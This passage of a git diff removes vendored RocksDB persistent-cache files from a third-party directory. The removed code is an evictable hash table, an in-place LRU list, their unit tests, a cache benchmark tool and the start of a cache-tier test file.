-class EvictableHashTable : private HashTable<T*, Hash, Equal> {
- public:
-  typedef HashTable<T*, Hash, Equal> hash_table;
-
-  explicit EvictableHashTable(const size_t capacity = 1024 * 1024,
-                              const float load_factor = 2.0,
-                              const uint32_t nlocks = 256)
-      : HashTable<T*, Hash, Equal>(capacity, load_factor, nlocks),
-        lru_lists_(new LRUList<T>[hash_table::nlocks_]) {
-    assert(lru_lists_);
-  }
-
-  virtual ~EvictableHashTable() { AssertEmptyLRU(); }
-
-  //
-  // Insert given record to hash table (and LRU list)
-  //
-  bool Insert(T* t) {
-    const uint64_t h = Hash()(t);
-    typename hash_table::Bucket& bucket = GetBucket(h);
-    LRUListType& lru = GetLRUList(h);
-    port::RWMutex& lock = GetMutex(h);
-
-    WriteLock _(&lock);
-    if (hash_table::Insert(&bucket, t)) {
-      lru.Push(t);
-      return true;
-    }
-    return false;
-  }
-
-  //
-  // Lookup hash table
-  //
-  // Please note that read lock should be held by the caller. This is because
-  // the caller owns the data, and should hold the read lock as long as he
-  // operates on the data.
-  bool Find(T* t, T** ret) {
-    const uint64_t h = Hash()(t);
-    typename hash_table::Bucket& bucket = GetBucket(h);
-    LRUListType& lru = GetLRUList(h);
-    port::RWMutex& lock = GetMutex(h);
-
-    ReadLock _(&lock);
-    if (hash_table::Find(&bucket, t, ret)) {
-      ++(*ret)->refs_;
-      lru.Touch(*ret);
-      return true;
-    }
-    return false;
-  }
-
-  //
-  // Evict one of the least recently used object
-  //
-  T* Evict(const std::function<void(T*)>& fn = nullptr) {
-    uint32_t random = Random::GetTLSInstance()->Next();
-    const size_t start_idx = random % hash_table::nlocks_;
-    T* t = nullptr;
-
-    // iterate from start_idx .. 0 .. start_idx
-    for (size_t i = 0; !t && i < hash_table::nlocks_; ++i) {
-      const size_t idx = (start_idx + i) % hash_table::nlocks_;
-
-      WriteLock _(&hash_table::locks_[idx]);
-      LRUListType& lru = lru_lists_[idx];
-      if (!lru.IsEmpty() && (t = lru.Pop())) {
-        assert(!t->refs_);
-        // We got an item to evict, erase from the bucket
-        const uint64_t h = Hash()(t);
-        typename hash_table::Bucket& bucket = GetBucket(h);
-        T* tmp = nullptr;
-        bool status = hash_table::Erase(&bucket, t, &tmp);
-        assert(t == tmp);
-        (void)status;
-        assert(status);
-        if (fn) {
-          fn(t);
-        }
-        break;
-      }
-      assert(!t);
-    }
-    return t;
-  }
-
-  void Clear(void (*fn)(T*)) {
-    for (uint32_t i = 0; i < hash_table::nbuckets_; ++i) {
-      const uint32_t lock_idx = i % hash_table::nlocks_;
-      WriteLock _(&hash_table::locks_[lock_idx]);
-      auto& lru_list = lru_lists_[lock_idx];
-      auto& bucket = hash_table::buckets_[i];
-      for (auto* t : bucket.list_) {
-        lru_list.Unlink(t);
-        (*fn)(t);
-      }
-      bucket.list_.clear();
-    }
-    // make sure that all LRU lists are emptied
-    AssertEmptyLRU();
-  }
-
-  void AssertEmptyLRU() {
-#ifndef NDEBUG
-    for (uint32_t i = 0; i < hash_table::nlocks_; ++i) {
-      WriteLock _(&hash_table::locks_[i]);
-      auto& lru_list = lru_lists_[i];
-      assert(lru_list.IsEmpty());
-    }
-#endif
-  }
-
-  //
-  // Fetch the mutex associated with a key
-  // This call is used to hold the lock for a given data for extended period of
-  // time.
-  port::RWMutex* GetMutex(T* t) { return hash_table::GetMutex(t); }
-
- private:
-  typedef LRUList<T> LRUListType;
-
-  typename hash_table::Bucket& GetBucket(const uint64_t h) {
-    const uint32_t bucket_idx = h % hash_table::nbuckets_;
-    return hash_table::buckets_[bucket_idx];
-  }
-
-  LRUListType& GetLRUList(const uint64_t h) {
-    const uint32_t bucket_idx = h % hash_table::nbuckets_;
-    const uint32_t lock_idx = bucket_idx % hash_table::nlocks_;
-    return lru_lists_[lock_idx];
-  }
-
-  port::RWMutex& GetMutex(const uint64_t h) {
-    const uint32_t bucket_idx = h % hash_table::nbuckets_;
-    const uint32_t lock_idx = bucket_idx % hash_table::nlocks_;
-    return hash_table::locks_[lock_idx];
-  }
-
-  std::unique_ptr<LRUListType[]> lru_lists_;
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_test.cc b/thirdparty/rocksdb/utilities/persistent_cache/hash_table_test.cc
deleted file mode 100644
index 1a6df4e..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/hash_table_test.cc
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <stdlib.h>
-#include <iostream>
-#include <set>
-#include <string>
-
-#include "db/db_test_util.h"
-#include "util/arena.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "utilities/persistent_cache/hash_table.h"
-#include "utilities/persistent_cache/hash_table_evictable.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-struct HashTableTest : public testing::Test {
-  ~HashTableTest() { map_.Clear(&HashTableTest::ClearNode); }
-
-  struct Node {
-    Node() {}
-    explicit Node(const uint64_t key, const std::string& val = std::string())
-        : key_(key), val_(val) {}
-
-    uint64_t key_ = 0;
-    std::string val_;
-  };
-
-  struct Equal {
-    bool operator()(const Node& lhs, const Node& rhs) {
-      return lhs.key_ == rhs.key_;
-    }
-  };
-
-  struct Hash {
-    uint64_t operator()(const Node& node) {
-      return std::hash<uint64_t>()(node.key_);
-    }
-  };
-
-  static void ClearNode(Node node) {}
-
-  HashTable<Node, Hash, Equal> map_;
-};
-
-struct EvictableHashTableTest : public testing::Test {
-  ~EvictableHashTableTest() { map_.Clear(&EvictableHashTableTest::ClearNode); }
-
-  struct Node : LRUElement<Node> {
-    Node() {}
-    explicit Node(const uint64_t key, const std::string& val = std::string())
-        : key_(key), val_(val) {}
-
-    uint64_t key_ = 0;
-    std::string val_;
-    std::atomic<uint32_t> refs_{0};
-  };
-
-  struct Equal {
-    bool operator()(const Node* lhs, const Node* rhs) {
-      return lhs->key_ == rhs->key_;
-    }
-  };
-
-  struct Hash {
-    uint64_t operator()(const Node* node) {
-      return std::hash<uint64_t>()(node->key_);
-    }
-  };
-
-  static void ClearNode(Node* node) {}
-
-  EvictableHashTable<Node, Hash, Equal> map_;
-};
-
-TEST_F(HashTableTest, TestInsert) {
-  const uint64_t max_keys = 1024 * 1024;
-
-  // insert
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    map_.Insert(Node(k, std::string(1000, k % 255)));
-  }
-
-  // verify
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    Node val;
-    port::RWMutex* rlock = nullptr;
-    assert(map_.Find(Node(k), &val, &rlock));
-    rlock->ReadUnlock();
-    assert(val.val_ == std::string(1000, k % 255));
-  }
-}
-
-TEST_F(HashTableTest, TestErase) {
-  const uint64_t max_keys = 1024 * 1024;
-  // insert
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    map_.Insert(Node(k, std::string(1000, k % 255)));
-  }
-
-  auto rand = Random64(time(nullptr));
-  // erase a few keys randomly
-  std::set<uint64_t> erased;
-  for (int i = 0; i < 1024; ++i) {
-    uint64_t k = rand.Next() % max_keys;
-    if (erased.find(k) != erased.end()) {
-      continue;
-    }
-    assert(map_.Erase(Node(k), /*ret=*/nullptr));
-    erased.insert(k);
-  }
-
-  // verify
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    Node val;
-    port::RWMutex* rlock = nullptr;
-    bool status = map_.Find(Node(k), &val, &rlock);
-    if (erased.find(k) == erased.end()) {
-      assert(status);
-      rlock->ReadUnlock();
-      assert(val.val_ == std::string(1000, k % 255));
-    } else {
-      assert(!status);
-    }
-  }
-}
-
-TEST_F(EvictableHashTableTest, TestEvict) {
-  const uint64_t max_keys = 1024 * 1024;
-
-  // insert
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    map_.Insert(new Node(k, std::string(1000, k % 255)));
-  }
-
-  // verify
-  for (uint64_t k = 0; k < max_keys; ++k) {
-    Node* val = map_.Evict();
-    // unfortunately we can't predict eviction value since it is from any one of
-    // the lock stripe
-    assert(val);
-    assert(val->val_ == std::string(1000, val->key_ % 255));
-    delete val;
-  }
-}
-
-}  // namespace rocksdb
-#endif
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/lrulist.h b/thirdparty/rocksdb/utilities/persistent_cache/lrulist.h
deleted file mode 100644
index 1d2ef31..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/lrulist.h
+++ /dev/null
@@ -1,174 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-// LRU element definition
-//
-// Any object that needs to be part of the LRU algorithm should extend this
-// class
-template <class T>
-struct LRUElement {
-  explicit LRUElement() : next_(nullptr), prev_(nullptr), refs_(0) {}
-
-  virtual ~LRUElement() { assert(!refs_); }
-
-  T* next_;
-  T* prev_;
-  std::atomic<size_t> refs_;
-};
-
-// LRU implementation
-//
-// In place LRU implementation. There is no copy or allocation involved when
-// inserting or removing an element. This makes the data structure slim
-template <class T>
-class LRUList {
- public:
-  virtual ~LRUList() {
-    MutexLock _(&lock_);
-    assert(!head_);
-    assert(!tail_);
-  }
-
-  // Push element into the LRU at the cold end
-  inline void Push(T* const t) {
-    assert(t);
-    assert(!t->next_);
-    assert(!t->prev_);
-
-    MutexLock _(&lock_);
-
-    assert((!head_ && !tail_) || (head_ && tail_));
-    assert(!head_ || !head_->prev_);
-    assert(!tail_ || !tail_->next_);
-
-    t->next_ = head_;
-    if (head_) {
-      head_->prev_ = t;
-    }
-
-    head_ = t;
-    if (!tail_) {
-      tail_ = t;
-    }
-  }
-
-  // Unlink the element from the LRU
-  inline void Unlink(T* const t) {
-    MutexLock _(&lock_);
-    UnlinkImpl(t);
-  }
-
-  // Evict an element from the LRU
-  inline T* Pop() {
-    MutexLock _(&lock_);
-
-    assert(tail_ && head_);
-    assert(!tail_->next_);
-    assert(!head_->prev_);
-
-    T* t = head_;
-    while (t && t->refs_) {
-      t = t->next_;
-    }
-
-    if (!t) {
-      // nothing can be evicted
-      return nullptr;
-    }
-
-    assert(!t->refs_);
-
-    // unlike the element
-    UnlinkImpl(t);
-    return t;
-  }
-
-  // Move the element from the front of the list to the back of the list
-  inline void Touch(T* const t) {
-    MutexLock _(&lock_);
-    UnlinkImpl(t);
-    PushBackImpl(t);
-  }
-
-  // Check if the LRU is empty
-  inline bool IsEmpty() const {
-    MutexLock _(&lock_);
-    return !head_ && !tail_;
-  }
-
- private:
-  // Unlink an element from the LRU
-  void UnlinkImpl(T* const t) {
-    assert(t);
-
-    lock_.AssertHeld();
-
-    assert(head_ && tail_);
-    assert(t->prev_ || head_ == t);
-    assert(t->next_ || tail_ == t);
-
-    if (t->prev_) {
-      t->prev_->next_ = t->next_;
-    }
-    if (t->next_) {
-      t->next_->prev_ = t->prev_;
-    }
-
-    if (tail_ == t) {
-      tail_ = tail_->prev_;
-    }
-    if (head_ == t) {
-      head_ = head_->next_;
-    }
-
-    t->next_ = t->prev_ = nullptr;
-  }
-
-  // Insert an element at the hot end
-  inline void PushBack(T* const t) {
-    MutexLock _(&lock_);
-    PushBackImpl(t);
-  }
-
-  inline void PushBackImpl(T* const t) {
-    assert(t);
-    assert(!t->next_);
-    assert(!t->prev_);
-
-    lock_.AssertHeld();
-
-    assert((!head_ && !tail_) || (head_ && tail_));
-    assert(!head_ || !head_->prev_);
-    assert(!tail_ || !tail_->next_);
-
-    t->prev_ = tail_;
-    if (tail_) {
-      tail_->next_ = t;
-    }
-
-    tail_ = t;
-    if (!head_) {
-      head_ = tail_;
-    }
-  }
-
-  mutable port::Mutex lock_;  // synchronization primitive
-  T* head_ = nullptr;         // front (cold)
-  T* tail_ = nullptr;         // back (hot)
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_bench.cc b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_bench.cc
deleted file mode 100644
index 4aeb054..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_bench.cc
+++ /dev/null
@@ -1,360 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() { fprintf(stderr, "Please install gflags to run tools\n"); }
-#else
-#include <gflags/gflags.h>
-#include <atomic>
-#include <functional>
-#include <memory>
-#include <sstream>
-#include <unordered_map>
-
-#include "rocksdb/env.h"
-
-#include "utilities/persistent_cache/block_cache_tier.h"
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-#include "utilities/persistent_cache/volatile_tier_impl.h"
-
-#include "monitoring/histogram.h"
-#include "port/port.h"
-#include "table/block_builder.h"
-#include "util/mutexlock.h"
-#include "util/stop_watch.h"
-
-DEFINE_int32(nsec, 10, "nsec");
-DEFINE_int32(nthread_write, 1, "Insert threads");
-DEFINE_int32(nthread_read, 1, "Lookup threads");
-DEFINE_string(path, "/tmp/microbench/blkcache", "Path for cachefile");
-DEFINE_string(log_path, "/tmp/log", "Path for the log file");
-DEFINE_uint64(cache_size, std::numeric_limits<uint64_t>::max(), "Cache size");
-DEFINE_int32(iosize, 4 * 1024, "Read IO size");
-DEFINE_int32(writer_iosize, 4 * 1024, "File writer IO size");
-DEFINE_int32(writer_qdepth, 1, "File writer qdepth");
-DEFINE_bool(enable_pipelined_writes, false, "Enable async writes");
-DEFINE_string(cache_type, "block_cache",
-              "Cache type. (block_cache, volatile, tiered)");
-DEFINE_bool(benchmark, false, "Benchmark mode");
-DEFINE_int32(volatile_cache_pct, 10, "Percentage of cache in memory tier.");
-
-namespace rocksdb {
-
-std::unique_ptr<PersistentCacheTier> NewVolatileCache() {
-  assert(FLAGS_cache_size != std::numeric_limits<uint64_t>::max());
-  std::unique_ptr<PersistentCacheTier> pcache(
-      new VolatileCacheTier(FLAGS_cache_size));
-  return pcache;
-}
-
-std::unique_ptr<PersistentCacheTier> NewBlockCache() {
-  std::shared_ptr<Logger> log;
-  if (!Env::Default()->NewLogger(FLAGS_log_path, &log).ok()) {
-    fprintf(stderr, "Error creating log %s \n", FLAGS_log_path.c_str());
-    return nullptr;
-  }
-
-  PersistentCacheConfig opt(Env::Default(), FLAGS_path, FLAGS_cache_size, log);
-  opt.writer_dispatch_size = FLAGS_writer_iosize;
-  opt.writer_qdepth = FLAGS_writer_qdepth;
-  opt.pipeline_writes = FLAGS_enable_pipelined_writes;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  std::unique_ptr<PersistentCacheTier> cache(new BlockCacheTier(opt));
-  Status status = cache->Open();
-  return cache;
-}
-
-// create a new cache tier
-// construct a tiered RAM+Block cache
-std::unique_ptr<PersistentTieredCache> NewTieredCache(
-    const size_t mem_size, const PersistentCacheConfig& opt) {
-  std::unique_ptr<PersistentTieredCache> tcache(new PersistentTieredCache());
-  // create primary tier
-  assert(mem_size);
-  auto pcache =
-      std::shared_ptr<PersistentCacheTier>(new VolatileCacheTier(mem_size));
-  tcache->AddTier(pcache);
-  // create secondary tier
-  auto scache = std::shared_ptr<PersistentCacheTier>(new BlockCacheTier(opt));
-  tcache->AddTier(scache);
-
-  Status s = tcache->Open();
-  assert(s.ok());
-  return tcache;
-}
-
-std::unique_ptr<PersistentTieredCache> NewTieredCache() {
-  std::shared_ptr<Logger> log;
-  if (!Env::Default()->NewLogger(FLAGS_log_path, &log).ok()) {
-    fprintf(stderr, "Error creating log %s \n", FLAGS_log_path.c_str());
-    abort();
-  }
-
-  auto pct = FLAGS_volatile_cache_pct / static_cast<double>(100);
-  PersistentCacheConfig opt(Env::Default(), FLAGS_path,
-                            (1 - pct) * FLAGS_cache_size, log);
-  opt.writer_dispatch_size = FLAGS_writer_iosize;
-  opt.writer_qdepth = FLAGS_writer_qdepth;
-  opt.pipeline_writes = FLAGS_enable_pipelined_writes;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  return NewTieredCache(FLAGS_cache_size * pct, opt);
-}
-
-//
-// Benchmark driver
-//
-class CacheTierBenchmark {
- public:
-  explicit CacheTierBenchmark(std::shared_ptr<PersistentCacheTier>&& cache)
-      : cache_(cache) {
-    if (FLAGS_nthread_read) {
-      fprintf(stdout, "Pre-populating\n");
-      Prepop();
-      fprintf(stdout, "Pre-population completed\n");
-    }
-
-    stats_.Clear();
-
-    // Start IO threads
-    std::list<port::Thread> threads;
-    Spawn(FLAGS_nthread_write, &threads,
-          std::bind(&CacheTierBenchmark::Write, this));
-    Spawn(FLAGS_nthread_read, &threads,
-          std::bind(&CacheTierBenchmark::Read, this));
-
-    // Wait till FLAGS_nsec and then signal to quit
-    StopWatchNano t(Env::Default(), /*auto_start=*/true);
-    size_t sec = t.ElapsedNanos() / 1000000000ULL;
-    while (!quit_) {
-      sec = t.ElapsedNanos() / 1000000000ULL;
-      quit_ = sec > size_t(FLAGS_nsec);
-      /* sleep override */ sleep(1);
-    }
-
-    // Wait for threads to exit
-    Join(&threads);
-    // Print stats
-    PrintStats(sec);
-    // Close the cache
-    cache_->TEST_Flush();
-    cache_->Close();
-  }
-
- private:
-  void PrintStats(const size_t sec) {
-    std::ostringstream msg;
-    msg << "Test stats" << std::endl
-        << "* Elapsed: " << sec << " s" << std::endl
-        << "* Write Latency:" << std::endl
-        << stats_.write_latency_.ToString() << std::endl
-        << "* Read Latency:" << std::endl
-        << stats_.read_latency_.ToString() << std::endl
-        << "* Bytes written:" << std::endl
-        << stats_.bytes_written_.ToString() << std::endl
-        << "* Bytes read:" << std::endl
-        << stats_.bytes_read_.ToString() << std::endl
-        << "Cache stats:" << std::endl
-        << cache_->PrintStats() << std::endl;
-    fprintf(stderr, "%s\n", msg.str().c_str());
-  }
-
-  //
-  // Insert implementation and corresponding helper functions
-  //
-  void Prepop() {
-    for (uint64_t i = 0; i < 1024 * 1024; ++i) {
-      InsertKey(i);
-      insert_key_limit_++;
-      read_key_limit_++;
-    }
-
-    // Wait until data is flushed
-    cache_->TEST_Flush();
-    // warmup the cache
-    for (uint64_t i = 0; i < 1024 * 1024; ReadKey(i++)) {
-    }
-  }
-
-  void Write() {
-    while (!quit_) {
-      InsertKey(insert_key_limit_++);
-    }
-  }
-
-  void InsertKey(const uint64_t key) {
-    // construct key
-    uint64_t k[3];
-    Slice block_key = FillKey(k, key);
-
-    // construct value
-    auto block = NewBlock(key);
-
-    // insert
-    StopWatchNano timer(Env::Default(), /*auto_start=*/true);
-    while (true) {
-      Status status = cache_->Insert(block_key, block.get(), FLAGS_iosize);
-      if (status.ok()) {
-        break;
-      }
-
-      // transient error is possible if we run without pipelining
-      assert(!FLAGS_enable_pipelined_writes);
-    }
-
-    // adjust stats
-    const size_t elapsed_micro = timer.ElapsedNanos() / 1000;
-    stats_.write_latency_.Add(elapsed_micro);
-    stats_.bytes_written_.Add(FLAGS_iosize);
-  }
-
-  //
-  // Read implementation
-  //
-  void Read() {
-    while (!quit_) {
-      ReadKey(random() % read_key_limit_);
-    }
-  }
-
-  void ReadKey(const uint64_t val) {
-    // construct key
-    uint64_t k[3];
-    Slice key = FillKey(k, val);
-
-    // Lookup in cache
-    StopWatchNano timer(Env::Default(), /*auto_start=*/true);
-    std::unique_ptr<char[]> block;
-    size_t size;
-    Status status = cache_->Lookup(key, &block, &size);
-    if (!status.ok()) {
-      fprintf(stderr, "%s\n", status.ToString().c_str());
-    }
-    assert(status.ok());
-    assert(size == (size_t) FLAGS_iosize);
-
-    // adjust stats
-    const size_t elapsed_micro = timer.ElapsedNanos() / 1000;
-    stats_.read_latency_.Add(elapsed_micro);
-    stats_.bytes_read_.Add(FLAGS_iosize);
-
-    // verify content
-    if (!FLAGS_benchmark) {
-      auto expected_block = NewBlock(val);
-      assert(memcmp(block.get(), expected_block.get(), FLAGS_iosize) == 0);
-    }
-  }
-
-  // create data for a key by filling with a certain pattern
-  std::unique_ptr<char[]> NewBlock(const uint64_t val) {
-    unique_ptr<char[]> data(new char[FLAGS_iosize]);
-    memset(data.get(), val % 255, FLAGS_iosize);
-    return data;
-  }
-
-  // spawn threads
-  void Spawn(const size_t n, std::list<port::Thread>* threads,
-             const std::function<void()>& fn) {
-    for (size_t i = 0; i < n; ++i) {
-      threads->emplace_back(fn);
-    }
-  }
-
-  // join threads
-  void Join(std::list<port::Thread>* threads) {
-    for (auto& th : *threads) {
-      th.join();
-    }
-  }
-
-  // construct key
-  Slice FillKey(uint64_t (&k)[3], const uint64_t val) {
-    k[0] = k[1] = 0;
-    k[2] = val;
-    void* p = static_cast<void*>(&k);
-    return Slice(static_cast<char*>(p), sizeof(k));
-  }
-
-  // benchmark stats
-  struct Stats {
-    void Clear() {
-      bytes_written_.Clear();
-      bytes_read_.Clear();
-      read_latency_.Clear();
-      write_latency_.Clear();
-    }
-
-    HistogramImpl bytes_written_;
-    HistogramImpl bytes_read_;
-    HistogramImpl read_latency_;
-    HistogramImpl write_latency_;
-  };
-
-  std::shared_ptr<PersistentCacheTier> cache_;  // cache implementation
-  std::atomic<uint64_t> insert_key_limit_{0};   // data inserted upto
-  std::atomic<uint64_t> read_key_limit_{0};     // data can be read safely upto
-  bool quit_ = false;                           // Quit thread ?
-  mutable Stats stats_;                         // Stats
-};
-
-}  // namespace rocksdb
-
-//
-// main
-//
-int main(int argc, char** argv) {
-  GFLAGS::SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                          " [OPTIONS]...");
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, false);
-
-  std::ostringstream msg;
-  msg << "Config" << std::endl
-      << "======" << std::endl
-      << "* nsec=" << FLAGS_nsec << std::endl
-      << "* nthread_write=" << FLAGS_nthread_write << std::endl
-      << "* path=" << FLAGS_path << std::endl
-      << "* cache_size=" << FLAGS_cache_size << std::endl
-      << "* iosize=" << FLAGS_iosize << std::endl
-      << "* writer_iosize=" << FLAGS_writer_iosize << std::endl
-      << "* writer_qdepth=" << FLAGS_writer_qdepth << std::endl
-      << "* enable_pipelined_writes=" << FLAGS_enable_pipelined_writes
-      << std::endl
-      << "* cache_type=" << FLAGS_cache_type << std::endl
-      << "* benchmark=" << FLAGS_benchmark << std::endl
-      << "* volatile_cache_pct=" << FLAGS_volatile_cache_pct << std::endl;
-
-  fprintf(stderr, "%s\n", msg.str().c_str());
-
-  std::shared_ptr<rocksdb::PersistentCacheTier> cache;
-  if (FLAGS_cache_type == "block_cache") {
-    fprintf(stderr, "Using block cache implementation\n");
-    cache = rocksdb::NewBlockCache();
-  } else if (FLAGS_cache_type == "volatile") {
-    fprintf(stderr, "Using volatile cache implementation\n");
-    cache = rocksdb::NewVolatileCache();
-  } else if (FLAGS_cache_type == "tiered") {
-    fprintf(stderr, "Using tiered cache implementation\n");
-    cache = rocksdb::NewTieredCache();
-  } else {
-    fprintf(stderr, "Unknown option for cache\n");
-  }
-
-  assert(cache);
-  if (!cache) {
-    fprintf(stderr, "Error creating cache\n");
-    abort();
-  }
-
-  std::unique_ptr<rocksdb::CacheTierBenchmark> benchmark(
-      new rocksdb::CacheTierBenchmark(std::move(cache)));
-
-  return 0;
-}
-#endif  // #ifndef GFLAGS
-#else
-int main(int, char**) { return 0; }
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.cc b/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.cc
deleted file mode 100644
index 5affc40..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/persistent_cache_test.cc
+++ /dev/null
@@ -1,471 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/persistent_cache_test.h"
-
-#include <functional>
-#include <memory>
-#include <thread>
-
-#include "utilities/persistent_cache/block_cache_tier.h"
-
-namespace rocksdb {
-
-static const double kStressFactor = .125;
-
-#ifdef OS_LINUX
-static void OnOpenForRead(void* arg) {
-  int* val = static_cast<int*>(arg);
-  *val &= ~O_DIRECT;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "NewRandomAccessFile:O_DIRECT",
-      std::bind(OnOpenForRead, std::placeholders::_1));
-}
-
-static void OnOpenForWrite(void* arg) {
-  int* val = static_cast<int*>(arg);
-  *val &= ~O_DIRECT;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "NewWritableFile:O_DIRECT",
-      std::bind(OnOpenForWrite, std::placeholders::_1));
-}
-#endif
-
-static void RemoveDirectory(const std::string& folder) {
-  std::vector<std::string> files;
-  Status status = Env::Default()->GetChildren(folder, &files);
-  if (!status.ok()) {
-    // we assume the directory does not exist
-    return;
-  }
-
-  // cleanup files with the patter :digi:.rc
-  for (auto file : files) {
-    if (file == "." || file == "..") {
-      continue;
-    }
-    status = Env::Default()->DeleteFile(folder + "/" + file);
-    assert(status.ok());
-  }
-
-  status = Env::Default()->DeleteDir(folder);
-  assert(status.ok());
-}
-
-static void OnDeleteDir(void* arg) {
-  char* dir = static_cast<char*>(arg);
-  RemoveDirectory(std::string(dir));
-}
-
-//
-// Simple logger that prints message on stdout
-//
-class ConsoleLogger : public Logger {
- public:
-  using Logger::Logv;
-  ConsoleLogger() : Logger(InfoLogLevel::ERROR_LEVEL) {}
-
-  void Logv(const char* format, va_list ap) override {
-    MutexLock _(&lock_);
-    vprintf(format, ap);
-    printf("\n");
-  }
-
-  port::Mutex lock_;
-};
-
-// construct a tiered RAM+Block cache
-std::unique_ptr<PersistentTieredCache> NewTieredCache(
-    const size_t mem_size, const PersistentCacheConfig& opt) {
-  std::unique_ptr<PersistentTieredCache> tcache(new PersistentTieredCache());
-  // create primary tier
-  assert(mem_size);
-  auto pcache = std::shared_ptr<PersistentCacheTier>(new VolatileCacheTier(
-      /*is_compressed*/ true, mem_size));
-  tcache->AddTier(pcache);
-  // create secondary tier
-  auto scache = std::shared_ptr<PersistentCacheTier>(new BlockCacheTier(opt));
-  tcache->AddTier(scache);
-
-  Status s = tcache->Open();
-  assert(s.ok());
-  return tcache;
-}
-
-// create block cache
-std::unique_ptr<PersistentCacheTier> NewBlockCache(
-    Env* env, const std::string& path,
-    const uint64_t max_size = std::numeric_limits<uint64_t>::max(),
-    const bool enable_direct_writes = false) {
-  const uint32_t max_file_size = static_cast<uint32_t>(12 * 1024 * 1024 * kStressFactor);
-  auto log = std::make_shared<ConsoleLogger>();
-  PersistentCacheConfig opt(env, path, max_size, log);
-  opt.cache_file_size = max_file_size;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  opt.enable_direct_writes = enable_direct_writes;
-  std::unique_ptr<PersistentCacheTier> scache(new BlockCacheTier(opt));
-  Status s = scache->Open();
-  assert(s.ok());
-  return scache;
-}
-
-// create a new cache tier
-std::unique_ptr<PersistentTieredCache> NewTieredCache(
-    Env* env, const std::string& path, const uint64_t max_volatile_cache_size,
-    const uint64_t max_block_cache_size =
-        std::numeric_limits<uint64_t>::max()) {
-  const uint32_t max_file_size = static_cast<uint32_t>(12 * 1024 * 1024 * kStressFactor);
-  auto log = std::make_shared<ConsoleLogger>();
-  auto opt = PersistentCacheConfig(env, path, max_block_cache_size, log);
-  opt.cache_file_size = max_file_size;
-  opt.max_write_pipeline_backlog_size = std::numeric_limits<uint64_t>::max();
-  // create tier out of the two caches
-  auto cache = NewTieredCache(max_volatile_cache_size, opt);
-  return cache;
-}
-
-PersistentCacheTierTest::PersistentCacheTierTest()
-    : path_(test::TmpDir(Env::Default()) + "/cache_test") {
-#ifdef OS_LINUX
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("NewRandomAccessFile:O_DIRECT",
-                                                 OnOpenForRead);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("NewWritableFile:O_DIRECT",
-                                                 OnOpenForWrite);
-#endif
-}
-
-// Block cache tests
-TEST_F(PersistentCacheTierTest, DISABLED_BlockCacheInsertWithFileCreateError) {
-  cache_ = NewBlockCache(Env::Default(), path_,
-                         /*size=*/std::numeric_limits<uint64_t>::max(),
-                         /*direct_writes=*/ false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack( 
-    "BlockCacheTier::NewCacheFile:DeleteDir", OnDeleteDir);
-
-  RunNegativeInsertTest(/*nthreads=*/ 1,
-                        /*max_keys*/
-                          static_cast<size_t>(10 * 1024 * kStressFactor));
-
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-#ifdef TRAVIS
-// Travis is unable to handle the normal version of the tests running out of
-// fds, out of space and timeouts. This is an easier version of the test
-// specifically written for Travis
-TEST_F(PersistentCacheTierTest, BasicTest) {
-  cache_ = std::make_shared<VolatileCacheTier>();
-  RunInsertTest(/*nthreads=*/1, /*max_keys=*/1024);
-
